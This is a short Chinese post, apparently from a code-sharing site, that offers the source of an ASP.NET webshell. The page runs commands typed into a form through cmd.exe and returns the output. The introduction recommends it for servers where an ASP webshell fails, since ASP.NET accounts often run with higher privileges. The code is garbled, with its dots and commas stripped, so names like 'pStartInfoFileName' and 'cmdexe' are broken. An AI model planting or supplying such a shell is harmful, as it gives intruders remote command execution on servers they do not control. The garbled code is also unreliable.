一个ASP
Net下的WebShell
主要完成cmd命令
一般的服务器设置
asp
net用户的权限都比较高
如果asp的webshell无法执行
可能asp
net的可以执行
代码如下
复制代码 代码如下:
<%@ Page Language="C#" AutoEventWireup="true" %>
<%@ Import Namespace="SystemRuntimeInteropServices" %>
<%@ Import Namespace="SystemIO" %>
<%@ Import Namespace="SystemData" %>
<%@ Import Namespace="SystemReflection" %>
<%@ Import Namespace="SystemDiagnostics" %>
<%@ Import Namespace="SystemWeb" %>
<%@ Import Namespace="SystemWebUI" %>
<%@ Import Namespace="SystemWebUIWebControls" %>
<script runat="server">
protected void exec(object sender EventArgs e)
{
string item = cmdText;
Process p = new Process();
pStartInfoFileName = "cmdexe";
pStartInfoUseShellExecute = false;
pStartInfoRedirectStandardInput = true;
pStartInfoRedirectStandardOutput = true;
pStartInfoRedirectStandardError = true;
pStartInfoCreateNoWindow = true;
string strOutput = null;
pStart();
pStandardInputWriteLine(item);
pStandardInputWriteLine("exit");
strOutput = pStandardOutputReadToEnd();
pWaitForExit();
pClose();
ResponseWrite("<pre>");
ResponseWrite(strOutput);
ResponseWrite("</pre>");
}
protected void Page_Load(object sender EventArgs e)
{
}
</script>
<form id="form" runat="server">
<asp:TextBox id="cmd" runat="server" Text="dir c:" /><asp:Button id="btn" onclick="exec" runat="server" Text="execute" />
</form>
